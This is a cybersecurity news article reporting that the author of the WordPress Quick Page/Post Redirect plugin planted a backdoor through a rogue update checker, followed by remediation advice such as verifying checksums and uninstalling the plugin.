Critical WordPress Plugin Bug Lets Attackers Inject Malicious Code
Key Takeaways A critical supply chain vulnerability was discovered in the popular WordPress Quick Page/Post Redirect Plugin, affecting over 70,000 active installations. The plugin’s original...
Key Takeaways
- A critical supply chain vulnerability was discovered in the popular WordPress Quick Page/Post Redirect Plugin, affecting over 70,000 active installations.
- The plugin’s original author intentionally introduced a backdoor five years ago, enabling silent injection of arbitrary malicious code.
- This sophisticated attack leveraged a custom update mechanism to bypass security checks, facilitating parasite SEO and remote code execution.
- While the command-and-control server is currently offline, the update mechanism remains active, posing a persistent threat.
- Users are urged to verify plugin checksums and uninstall the compromised plugin, replacing it with secure alternatives.
Sophisticated Backdoor Uncovered in Popular WordPress Plugin
A significant supply chain vulnerability has been identified within the Quick Page/Post Redirect Plugin, a widely used WordPress extension boasting more than 70,000 active installations. Security researcher Austin Ginder unearthed a dormant backdoor, surreptitiously introduced half a decade ago, designed to inject arbitrary malicious code into websites without detection.
Table Of Content
This malicious functionality circumvented standard security protocols by utilizing a custom remote update checker, effectively transforming the plugin into a vector for illicit SEO manipulation and potential remote code execution.
Deep Dive: The Backdoored WordPress Plugin
The investigation into this compromise began following routine security audits on a hosting infrastructure, which flagged unusual behavior in plugin version 5.2.3. Despite websites reporting this version number, their file hashes did not align with those of the official release hosted on the WordPress repository. It was discovered that the tampered files contained an unauthorized function configured to communicate with a third-party server, subsequently injecting content directly into website pages.
To maintain stealth, the injected code was specifically hidden from logged-in administrators, activating only for regular site visitors and search engine crawlers. The compromise involved a highly intricate, multi-stage process incorporating two distinct backdoors.
The active component of the backdoor was a bundled version of a plugin update checker library. This library was configured to poll a server under the developer’s control, rather than the legitimate WordPress update infrastructure. This setup granted the malicious actor the ability to push unauthorized updates with full administrative privileges. The passive element was the injected payload itself, which covertly fetched and displayed hidden content from a remote command-and-control server. Although this command-and-control server is currently inactive, rendering the backdoor dormant, the update mechanism remains fully operational and could be re-activated at any moment.
An Inside Job: Supply Chain Attack Orchestrated by Author
Extensive analysis of the plugin’s commit history revealed that the attack was orchestrated by the plugin’s original author, identified as anadnet. The developer intentionally committed the malicious self-updater to the official repository in late 2020, facilitating its propagation to thousands of websites. Months later, the author distributed the tampered payload via their private server before discreetly removing the custom updater from the official source code. This calculated move erased obvious traces of the compromise from the official repository, yet left existing installations permanently linked to the attacker’s infrastructure.
In April 2026, the WordPress plugin review team temporarily removed the Quick Page/Post Redirect Plugin from its directory, pending a thorough investigation. Traditional vulnerability scanners often fail to detect this type of supply chain compromise due to attackers’ ability to spoof version numbers.
According to a report by Austin Ginder at Anchor, administrators should utilize the built-in WordPress command-line tool to verify plugin checksums against the official repository. Any discrepancy indicates a compromised file. Security experts strongly advise completely uninstalling any affected plugin and migrating to actively maintained, secure alternatives.
What You Should Do
- Verify Plugin Checksums: Use the WordPress command-line interface (WP-CLI) to check the integrity of your installed plugins against the official WordPress repository. Mismatched checksums indicate potential compromise.
- Uninstall Immediately: If the Quick Page/Post Redirect Plugin is installed on your WordPress site, uninstall it completely. Deactivating it is insufficient, as the malicious update mechanism could still be active.
- Choose Alternatives: Replace the compromised plugin with actively maintained and reputable redirect plugins from trusted sources.
- Review Logs: Conduct a thorough review of your website and server logs for any suspicious activity or unauthorized file modifications.
- Update Regularly: Ensure all other plugins, themes, and your WordPress core are kept up-to-date to mitigate other known vulnerabilities.
Disclaimer: HackersRadar reports on cybersecurity threats and incidents for informational and awareness purposes only. We do not engage in hacking activities, data exfiltration, or the hosting or distribution of stolen or leaked information. All content is based on publicly available sources.



No Comment! Be the first one.